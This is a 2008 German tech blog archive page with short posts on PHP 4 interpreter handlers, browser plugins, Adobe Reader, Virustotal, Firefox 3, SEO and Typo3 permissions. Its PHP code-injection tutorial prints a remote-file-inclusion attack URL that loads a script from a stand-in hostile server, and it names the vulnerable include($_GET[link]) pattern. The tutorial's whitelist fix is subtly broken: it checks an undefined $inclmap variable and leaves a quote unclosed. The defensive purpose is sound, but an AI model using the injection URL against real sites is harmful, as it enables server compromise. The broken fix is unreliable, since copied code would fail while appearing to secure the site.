Autorenarchiv

Aug 08

PHP 4 doch noch nicht tot - Interpreter für Skripte frei wählen

Friday, 8. August 2008 10:02

PHP 4 ist nun in der Version 4.4.9 erschienen. Eigentlich sollte Version 4.4.8 die letzte PHP 4 Version sein, welche bereits am im Juli 2004 durch die Version 5 der Scriptsprache abgelöst wurde. Mehr als 8 Jahre nach dem Release von PHP 4 erschien so ein weiteres Update - Die Entwickler stufen es als Sicherheitskritisch ein.

Auf Vielen Webservern läuft PHP 4 noch parallel zu PHP 5. Über die Dateiendung kann man dann wählen, welcher Interpreter für die jeweiligen Skripte verwendet werden soll.

Zuvor muss aber erst definiert werden, welche Dateiendung von welchem PHP Interpreter behandelt wird. Dies kann man mittels der htaccess Datei steuern (Vermutlich gibt es auch einen Weg über die php.ini, aber viele Kunden haben hierauf keinen Zugriff. IMHO ist der Weg über htaccess einfacher)

So funktionierts: Einfach die folgenden Zeilen in die .htaccess Datei z.B. ins höchste Verzeichnis der Webseite kopieren:
AddHandler application/x-httpd-php43 .php
AddHandler application/x-httpd-php4 .php4
AddHandler application/x-httpd-php5 .htm

Die Zeilen können beliebig angepasst werden. In diesem Beispiel werden Dateien mit der Dateiendung php nun vom PHP 4.3 Interpreter aufgerufen (sofern diese veraltete Version noch installiert ist). php4 Dateien vom PHP 4 Interpeter und htm Dateien vom php5 Interpreter. Bei der Umstellung auf eine neue PHP Version können so ausgewählte Skripte - die nach der Umstellung nicht mehr funktionieren würden ohne Anpassungen am Programm selbst - einfach am laufen gehalten werden.

Gefunden bei Adrian Sauer via golem.de

Thema: News | Kommentare (1) | Autor: admin

Jul 22

Webseite als PDF speichern (Firefox Plugin)

Tuesday, 22. July 2008 14:07

Bei diesem Artikel bitte das Update beachten.

Das von nitro PDF Software entwickelte, kostenfreie Plugin für den Firefox ist nun in Version 2.0 erschienen, es erlaubt per Knopfdruck bequem HTML Seiten in ein PDF umzuwandeln.

Das Plugin in Aktion

Der Download bei Mozilla wurde bereits 8,6 Millionen mal benutzt.

[Update] Voller Euphorie habe ich diesen Eintrag geschrieben um jetzt nach dem Test festzustellen, dass das Plugin nicht selbst konvertiert, sondern nur auf eine Webseite umleitet die das Konvertieren dann übernimmt. Und das Umwandeln hat auf dieser Webseite dann noch nichteinmal funktioniert.

Allerdings bietet es eine andere nützliche und arbeitende Funktion:

Klickt man beim surfen auf einen Link der zu einem PDF Dokument zeigt, so kann man sich selbst entscheiden, ob man es innerhalb des Browsers oder in einem anderen Viewer außerhalb anzeigen möchte. Man kann es auch in ein HTML-Dokument umwandeln lassen (was wieder über die Umleitung auf eine andere Webseite funktioniert - also nichts für kritische Daten).

Aus dem letzten Grund behalte ich das Plugin vorerst. Allerdings würde ich zum Erstellen von PDF Dateien dann schon eher: PDF Creator empfehlen. Es gaugelt dem Computer einen Drucker vor. Man druckt also aus einer beliebigen Anwendung, so auch aus dem Browser auf diesem “PDF-Drucker” und erhält eine PDF-Datei statt einer Druckausgabe - ebenso schnell und einfach - aber sicherer.

Thema: News | Kommentare (6) | Autor: admin

Jul 18

PHP - Code Injection Angriffe

Friday, 18. July 2008 10:45

Einige Personen sind der Meinung, dass PHP per se eine unsichere Programmiersprache ist. Wie kommt man darauf? Die Sprache kann IMHO nur insoweit etwas für Ihren Ruf, als dass sie es dem Programmierer erlaubt ziemlich einfach komplexe Operationen aneinanderzureihen, die im Zusammenspiel dann zum Sicherheitsloch werden.

Wie läuft eine PHP Code Injection grundsätzlich ab? Wie auf Glorf IT erwähnt gibt es jede Menge Angreifer, die versuchen durch automatische Spider das Web nach Sicherheitslöchern abzugrasen um diese anschließend auszunutzen. Nicht selten versuchen sie durch Übergabe einer Adresse in der URL z.B. http://www.alin.eu/?link=http://boeseseite/boesesscript.php ein boeses Skript auf meinem Server auszuführen. Solche Aufrufe findet man fast häufiger im Serverlog als richtige Seitenzugriffe von Besuchern.

Wenn man im PHP Code nun so etwas wie include($_GET[link]) stehen hat, was manche Content Management Systeme hin und wieder tatsächlich verwenden um Inhalt aus anderen Dateien einzubinden, wird der Schadcode vom fremden Server hereingeladen. Es kann beliebiger schädlicher PHP-Code ausgeführt werden.

Gegen solche Angriffe kann man sich noch relativ einfach schützen, indem man in der php.ini den Eintrag allow_url_fopen=On auf allow_url_fopen=Off setzt. Dann können keine Dateien mehr von anderen Servern aufgerufen werden. Nachteil: Auch alle anderen PHP Skripte können nicht mehr auf Dateien von anderen Servern zugreifen. Zudem kann der Angreifer immer noch Code ausführen, wenn er an anderer Stelle die Gelegenheit bekommt Dateien auf den Server abzulegen. Ein typischen Fall wie das funktioniert ist im Flashforum humorvoll erklärt.

Eine wie ich behaupte sichere Methode ist es, die Benutzereingaben nicht direkt zu verwenden, sondern sie zum Beispiel über ein assoziatives Array einer vorgegebenen Seite zuzuordnen.

$arraymap = array( 'index' => 'index.php', 'impressum' => 'impressum.php', //usw );


if(!empty($_GET['link']) && isset($inclmap[$_GET['link']])) {

      $content = $arraymap[$_GET['link]];

      } else {

     //Startseite aufrufen oder 404

}

include($content);

Natürlich gibt es noch viele weitere Angriffsmöglichkeiten im Zusammenhang mit PHP. Auf nettuts.com wird eine kleine Übersicht gegeben.

Weitere Sicherheitslücken die nicht direkt etwas mit PHP zu tun haben, aber häufig in interaktiven Webumgebungen anzutreffen sind Cross-Site-Scripting (XSS) Lücken. (siehe Wikipedia)

Auch Wordpress Blogs sind immer mal wieder Opfer von solchen Angriffen. Wie man sein Wordpress Blog einigermaßen vor Angriffen schützt erfährt man bei brajeshwar.com (Englisch).

Ich erhebe mit dem Tutorial natürlich keinen Anspruch auf Vollständigkeit. Kommentare und Hinweise sind herzlich erwünscht.

Thema: Entwicklung | Kommentare (1) | Autor: admin

Jul 09

Google Lively: 3D-Welten einfach in Webseiten integrieren

Wednesday, 9. July 2008 15:22

Eine neue Idee von Google: Erstelle einen virtuellen Raum und stelle Ihn auf deine Webseite. Durch ein Plugin lässt sich dieser Raum betreten und sich dort mit anderen Besuchern der Webseite austauschen. Eine interessante Idee! Vielleicht auch ein neuer Hype?

Eine Vorschau und der Download findet sich hier:
http://www.lively.com/html/landing.html

Das Plugin ist für Firefox und Internet Explorer erhältlich und leider bisher nur auf Windows XP oder Vista lauffähig.

via golem.de

Thema: News | Kommentare (0) | Autor: admin

Jul 02

Adobe Reader 9 mit einigen Neuerungen

Wednesday, 2. July 2008 20:42

Nachdem der Firefox 3 mit großem Weltrekordspektakel mehr als 8 Millionen Downloads (Links zu Statistiken auf helmschrott.de) innerhalb der ersten 24 Stunden verzeichnete, veröffentlicht Adobe nun die neunte Version seines Adobe Readers.

Neben den Eigenschaften, dass diese Software auch in der Version 9 immer noch PDFs lesen kann gibts nun laut golem.de u. a. die Möglichkeit, dass mehrere Anwender auf verschiedenen PCs gleichzeitig ein PDF Dokument lesen können. Dabei wird bei jedem Benutzer die gleiche Seite angezeigt.

Zudem können PDF-Portfolios angezeigt werden. Ein neues Containerformat, in dem Video und Audio-Dateien usw. in einer PDF-Datei untergebracht werden können.

Wer braucht sowas? Top oder Flop? Ich werde das ca. 30 MB große Teil mal testen, denn Adobe verspricht, dass die Version 9 schneller laden soll als der Vorgänger.

Die Linuxer unter uns müssen sich aber ohnehin noch gedulden. Bisher ist nur die MacOS X und Windows Version erschienen.

Zum Download

[Update]
Ganze 160 MB freien Speicherplatz fordert die neue Version. Unter diesem Umständen muss mein PC auf die neueste Version erstmal verzichten.

Thema: News | Kommentare (2) | Autor: admin

Jul 02

Virenerkennung per Webdienst?

Wednesday, 2. July 2008 17:30

Nichteinmal 1% aller Viren werden von allen gängigen Virenprogrammen erkannt. Was macht man, wenn man eine verdächtige Datei gefunden hat, der Virenscanner aber nicht Alarm schlägt?

Der von heise.de verwendete Webservice Virustotal testet die Datei einfach und zuverlässig mithilfe von über 30 Virenscannern - im Programm sind unter anderem Norton Antivirus, Bitdefender und Avira Antivir. Zudem gibt der Webservice einen guten Überblick welche Virenscanner den betreffenden Schädling erkannt hätten.

Wenn man den Uploader auf der Virustotal-Webseite herunterläd kann man als Windows Benutzer betreffende Dateien ganz einfach im Explorer per rechte Maustaste überprüfen lassen.

Der Dienst erwies mir erst kürzlich gute Dienste, als ich einen Virus vom Typ “Browser Hijacker” auf einen Laptop fand. Mithilfe von HijackThis und dem Online Dienst fand ich den Störenfried, der vom einfachen Virenscanner nicht erkannt wurde schließlich.

Thema: Tipps | Kommentare (0) | Autor: admin

Jun 17

Firefox 3 ab jetzt zum Download

Tuesday, 17. June 2008 20:20

Firefox 3 steht ab dem 17. Juni um 19 MESZ zum Download bereit. Mozilla zählt ab dann 24 Stunden lang alle Downloads und möchte den Weltrekord für die meisten Downloads am Tag aufstellen.

Der neue Firefox bringt jede Menge Neuerungen mit sich und ist dabei noch schneller als sein Vorgänger. Der 7 MB Download rentiert sich somit für die allermeisten Benutzer.

Im Moment (20 Uhr MESZ) bricht die mozilla.com Webseite regelmäßig unter der enormen Serverlast zusammen. Ob es trotzdem etwas mit dem Rekordversuch wird, bleibt deshalb noch offen.

Die besten Chancen noch heute an den erfolgreichen Internet Browser zu kommen hat man, wenn man den folgenden Link direkt aufruft:
Direkt zum Download von Firefox 3.0 (eventuell sind mehrere Versuche notwendig).

Weitere Downloadmöglichkeiten gibts bei
netzpoltik.org

[Update] Der Rekordversuch ist mit 8 Millionen Downloads innerhalb der ersten 24h nun laut eines Artikels auf golem.de tatsächlich erfolgreich verlaufen.

Thema: News | Kommentare (0) | Autor: admin

Jun 15

E-book “Urheberrecht im Alltag” zum Download

Sunday, 15. June 2008 15:33

Das massive E-Book “Urheberrecht im Alltag” kann seit einiger Zeit kostenlos heruntergeladen werden. Es erklärt verständlich, aber ausführlich, was man beim Kopieren bzw. Brennen von CDs beachten muss. Welche Regeln es gibt, wenn man eigene Musik macht, CDs für Freunde brennt, Filme dreht oder Bücher schreibt? Wie funktionieren freie Lizenzen? Wie hat sich das Urheberrecht entwickelt? Und was bedeutet das für Autoren und Nutzer? 2008 erhielt es den Klicksafe Preis für Sicherheit im Internet.via netzpolitik.org.

Hier gehts direkt zum Download (14 MB)

Thema: Allgemein | Kommentare (0) | Autor: admin

Jun 15

Google straft mod_rewrite und schöne URLs bei Wordpress?

Sunday, 15. June 2008 11:22

Vor zwei Tagen habe ich meinen Wordpress Blog mithilfe von mod_rewrite auf schönere URLs mit Keywords in der URL umgestellt. Google scheint das nicht zu gefallen. War mein Blog bei den Suchphrasen “satire telekom” und “web und netzwerk” vor der Umstellung noch auf Platz 1 gerankt, ist mein Blog unter “Web und Netzwerk” nun auf Platz 3 und unter erster Phrase sogar auf den letzten Platz von Seite 2 abgerutscht. Und so ging es durchgängig mit allen getesten Suchwörtern. Und sogar das rss-Verzeichnis in welchem mein Blog gelistet ist, ist mit den gleichen Suchbegriffen nun höher gerankt.

Mal sehen wie sich das in den nächsten Tagen entwickelt, vielleicht sind Keywords in den URLs nicht mehr so empfehlenswert wie eine einfache Ziffer? Oder hat jemand ähnliche Erfahrungen gemacht, auf Kommentare würde ich mich freuen.

[Update]:
Die Beeinträchtigung war scheinbar nur ein kurzfristiger Effekt. Dem Einsatz von mod_rewrite spricht also nichts entgegen.

Thema: SEM | Kommentare (2) | Autor: admin

Jun 15

Typo3 Backendbenutzer richtig konfiguieren

Sunday, 15. June 2008 10:53

Erstellt man einen neuen Backendbenutzer, zum Beispiel einen Redakteur im beliebten Content-Management-System (CMS) Typo3 kann es vollkommen unintuitiv Probleme geben. Gibt man einen Benutzer beispielsweiße die Rechte für die Module Web->List (deutsch: Web->Liste), Web->Page (Web->Seite) und weist man ihm dann noch einen Wurzelknoten zu könnte man doch meinen, dass er alle Seiten unterhalb dieses Wurzelknotens bearbeiten darf.

Zur Sicherheit wirft man sogar noch einen Blick unter Page->Access (Page->Zugriff). Dennoch kann der Benutzer die Seite zwar im Seitenbaum anwählen, kann auf ihr aber keine Aktionen ausführen, geschweige denn neue Seitenelemente (Records) anlegen. Das Geheimnis von Typo3 liegt hier in den Einstellungen der Backenduser/Backendgruppe. Hierfür muss man unter Tools->User-Admin den Benutzer auswählen und klickt in der Benutzereinstellung unter Gruppen auf den “Bearbeitenbleistifft”. Den Hacken bei “Include Access List” auswählen und die Meldung mit OK bestätigen. Dort findet man nun eine lange Liste von Tabellen, auf die man Ihm Zugriff gewähren muss, damit er was bearbeiten kann. Wichtig sind unter anderen: tt_content und pages, ansonsten kann der Benutzer keine Records oder Seiten anlegen.

Ich habe keine Ahnung warum Typo3 das hier so kompliziert handhabt, aber das ist man eigentlich von diesem System gewohnt.

Thema: Uncategorized | Kommentare (0) | Autor: admin

« vorherige Beiträge

nächste Beiträge »